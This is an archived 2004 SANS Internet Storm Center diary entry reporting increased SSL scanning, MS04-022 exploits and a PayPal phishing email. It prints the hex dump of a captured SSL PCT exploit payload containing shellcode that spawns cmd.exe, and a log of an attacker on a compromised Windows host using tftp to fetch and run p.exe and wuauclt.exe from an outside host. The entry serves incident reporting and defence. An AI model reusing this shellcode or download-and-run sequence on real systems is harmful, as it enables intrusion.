Threat Level: green Handler on Duty: Rob VandenBrink

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Increased SSL Activity; Exploits for MS04-022; Mailbag

Published: 2004-07-17
Last Updated: 2004-07-18 00:41:45 UTC
by Kevin Hong (Version: 1)
0 comment(s)
New Reports of Increased SSL Activity
(Thanks to Chris Carboni for adding this entry)

We've received several reports of increased SSL activity reminiscent of activity seen last April after the release of MS04-011.

Preliminary analysis of Dshield data ( http://isc.sans.org/port_details.php?port=443 ) shows a sharp rise in activity beginning at some point on 7/15 UDT.

Data is currently being analyzed to determine if this is a re-hash of older exploits or if this activity has been generated by either a new exploit or a variation of older exploits.

From one of the submission, the payload was:

80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............

00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^

BE 98 EB 25 23 28 45 49 25 53 02 06 6C 59 6C 59 ...%#(EI%S..lYlY

F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_

33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].

ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...

78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K

1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..

31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...

84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u

E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..

0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...

4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S

FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...

89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U

58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.

55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e

78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW

57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.

50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U

F0 6A FF FF 55 E4 .j..U.


Notice the string "THCOWNZIIS!" in the payload. This resembles to the THC exploit for SSL PCT that was released in April, although it may also be a new variant.

We have a reader reported that the following was seen on an infected system:

Microsoft Windows 2000 [Version 5.00.2195]Microsoft Windows 2000 [Version 5.00.2195]Microsoft Windows 2000 [Version 5.00.2195]{D}{A}

(C) Copyright 1985-2000 Microsoft Corp.{D}{A}

{D}{A}

C:\WINNT\system32 > {A}

cd ..{D}{A}

{A}

cd ..{D}{A}

{D}{A}

C:\WINNT > {A}

tftp -i xx.xx.xx.xx get p.exe{D}{A}

{A}

tftp -i xx.xx.xx.xx get p.exe{D}{A}

Transfer successful: 13824 bytes in 1 second, 13824 bytes/s{D}{D}{A}

{D}{A}

C:\WINNT > {A}

p.exe{D}{A}

{A}

p.exe{D}{A}

{D}{A}

C:\WINNT > {A}

tftp -i xx.xx.xx.xx get wuauclt.exe{D}{A}

{A}

tftp -i xx.xx.xx.xx get wuauclt.exe{D}{A}

Transfer successful: 53760 bytes in 4 seconds, 13440 bytes/s{D}{D}{A}

{D}{A}

C:\WINNT > {A}

wuauclt.exe{D}{A}

{A}

wuauclt.exe{D}{A}

{D}{A}

C:\WINNT >


If you have a system that has been compromised, please send us a note with system configuration and patch level.
Exploits for MS04-022

Exploits for MS04-022 (Vulnerability in Task Scheduler Could Allow Code Execution) are known. By creating a specially crafted ".job" file, it is possible to cause a remote code execution using a number of common place applications as the attack vectors.

Do remember to update your system asap if you have not done so.

http://www.microsoft.com/technet/security/Bulletin/MS04-022.mspx
http://www.nextgenss.com/advisories/mstaskjob.txt
http://www.securityfocus.com/archive/1/368857/2004-07-11/2004-07-17/0
Mailbag

Yesterday diary on Russian Bank Scam ( http://isc.sans.org/diary.php?date=2004-07-16 ), we have received another similar attack on PayPal. Except for the IP addresses, the email is very similar to the one posted at

http://spamwatch.codefish.net.au/storage/trojan/030604/email2.txt

We have notified PayPal and they are investigating the case.
Keywords:
0 comment(s)
Diary Archives